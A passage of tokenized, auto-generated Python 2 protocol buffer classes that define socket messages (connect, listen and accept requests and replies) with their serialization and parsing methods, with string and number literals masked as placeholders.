<EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_options ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ConnectRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_remote_ip_ = <NUM_LIT:0> <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . remote_ip_ = AddressPort ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def remote_ip ( self ) : return self . remote_ip_ <EOL> def mutable_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:1> ; return self . remote_ip_ <EOL> def clear_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:0> ; self . remote_ip_ . Clear ( ) <EOL> def has_remote_ip ( self ) : return self . has_remote_ip_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_remote_ip ( ) ) : self . mutable_remote_ip ( ) . MergeFrom ( x . remote_ip ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ != x . has_remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ and self . remote_ip_ != x . remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_remote_ip_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . remote_ip_ . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( self . remote_ip_ . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_remote_ip_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_remote_ip ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSize ( ) ) <EOL> self . remote_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> self . remote_ip_ . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_remote_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kremote_ip = <NUM_LIT:2> <EOL> ktimeout_seconds = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ConnectReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ListenRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_backlog_ = <NUM_LIT:0> <EOL> backlog_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def backlog ( self ) : return self . backlog_ <EOL> def set_backlog ( self , x ) : <EOL> self . has_backlog_ = <NUM_LIT:1> <EOL> self . backlog_ = x <EOL> def clear_backlog ( self ) : <EOL> if self . has_backlog_ : <EOL> self . has_backlog_ = <NUM_LIT:0> <EOL> self . backlog_ = <NUM_LIT:0> <EOL> def has_backlog ( self ) : return self . has_backlog_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_backlog ( ) ) : self . set_backlog ( x . backlog ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_backlog_ != x . has_backlog_ : return <NUM_LIT:0> <EOL> if self . has_backlog_ and self . backlog_ != x . backlog_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_backlog_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . backlog_ ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_backlog_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . backlog_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_backlog ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . backlog_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_backlog_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . backlog_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_backlog ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_backlog_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . backlog_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kbacklog = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ListenReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AcceptRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> ktimeout_seconds = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> 